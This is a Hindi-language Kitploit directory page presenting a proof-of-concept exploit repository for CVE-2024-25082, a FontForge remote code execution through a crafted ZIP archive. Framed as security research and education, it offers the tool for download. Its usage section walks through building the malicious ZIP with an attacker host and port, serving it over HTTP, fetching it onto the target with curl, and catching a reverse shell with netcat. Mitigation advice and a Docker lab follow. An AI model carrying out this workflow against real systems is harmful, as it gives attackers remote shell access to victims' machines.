Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25082 — CVE-2024-25082 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फ़ॉन्टफोर्ज में तैयार किए गए ZIP आर्काइव के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है। इसमें पेलोड जनरेटर, डॉकर लैब और सुरक्षा अनुसंधान एवं शिक्षा के लिए तकनीकी लेख शामिल है। | Kitploit
उपकरण/GitHubGitHub/moamenx8/cve-2024-25082
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

CVE-2024-25082 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फ़ॉन्टफोर्ज में तैयार किए गए ZIP आर्काइव के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है। इसमें पेलोड जनरेटर, डॉकर लैब और सुरक्षा अनुसंधान एवं शिक्षा के लिए तकनीकी लेख शामिल है।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚠️ CVE-2024-25082 - FontForge ZIP रिमोट कोड निष्पादन (PoC)

License Python CVE

CVE-2024-25082 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो FontForge को प्रभावित करने वाली एक भेद्यता है और एक निर्मित ZIP संग्रह के माध्यम से रिमोट कोड निष्पादन (RCE) की अनुमति देती है।

यह भंडार दर्शाता है कि नियंत्रित प्रयोगशाला वातावरण में सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए भेद्यता का शोषण कैसे किया जा सकता है।


भेद्यता अवलोकन

  • CVE ID: CVE-2024-25082\
  • प्रभावित सॉफ्टवेयर: FontForge\
  • भेद्यता प्रकार: रिमोट कोड निष्पादन\
  • हमला वेक्टर: दुर्भावनापूर्ण ZIP संग्रह\
  • प्रभाव: निर्मित संग्रह को संसाधित करने पर मनमाना कमांड निष्पादन।

भेद्यता ZIP संग्रह के अंदर फ़ाइलों के अनुचित सत्यापन के कारण होती है, जिससे हमलावर लक्ष्य प्रणाली पर मनमाने कमांड निष्पादित कर सकता है।


भंडार संरचना

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

फ़ाइल विवरण


exploit.py दुर्भावनापूर्ण ZIP पेलोड उत्पन्न करता है poc/ उत्पन्न प्रूफ-ऑफ-कॉन्सेप्ट फ़ाइलें शामिल हैं writeup.md भेद्यता का तकनीकी विवरण


आवश्यकताएँ

  • Python 3.x
  • Netcat

वैकल्पिक उपकरण स्थापित करें:

root@kitploit:~
sudo apt install netcat

उपयोग

1️⃣ दुर्भावनापूर्ण पेलोड उत्पन्न करें

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

यह एक दुर्भावनापूर्ण exploit.zip फ़ाइल उत्पन्न करेगा।


2️⃣ शोषण को सर्वर पर रखें

root@kitploit:~
python3 -m http.server 8080

3️⃣ लक्ष्य प्रणाली से अपलोड करें

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ रिवर्स शेल पकड़ें

root@kitploit:~
nc -lvnp <Your Port>

सफल होने पर, लक्ष्य प्रणाली से एक शेल प्राप्त होना चाहिए।


भेद्यता को पुन: उत्पन्न करना

एक प्रतिलिपि योग्य भेद्य वातावरण docker/ निर्देशिका के अंदर प्रदान किया गया है।

उदाहरण:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

यह उत्पादन प्रणालियों को प्रभावित किए बिना सुरक्षित परीक्षण की अनुमति देता है।


सुरक्षा प्रभाव

एक हमलावर जो भेद्य एप्लिकेशन द्वारा संसाधित ZIP फ़ाइलों को अपलोड या नियंत्रित कर सकता है, वह निम्न कर सकता है:

  • मनमाने सिस्टम कमांड निष्पादित करना
  • रिमोट शेल एक्सेस प्राप्त करना
  • होस्ट सिस्टम से समझौता करना

शमन

अनुशंसित शमन कदम:

  • FontForge को पैच किए गए संस्करण में अपडेट करें
  • अपलोड किए गए संग्रह की सामग्री को मान्य करें
  • फ़ाइल अपलोड कार्यक्षमता को प्रतिबंधित करें
  • फोंट संसाधित करते समय सैंडबॉक्सिंग का उपयोग करें

अस्वीकरण

इस भंडार में सार्वजनिक रूप से खुलासा की गई भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट कोड है।

कोड केवल निम्न के लिए सख्ती से प्रदान किया गया है:

  • सुरक्षा अनुसंधान
  • शैक्षिक उद्देश्य
  • अधिकृत प्रवेश परीक्षण

स्पष्ट अनुमति के बिना इस कोड का प्रणालियों के विरुद्ध उपयोग न करें।

लेखक इस सॉफ्टवेयर द्वारा होने वाले दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।


लेखक

Moamen Elmaghrabi

साइबर सुरक्षा छात्र
प्रवेश परीक्षण और शोषण विकास


लाइसेंस

यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है।
विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें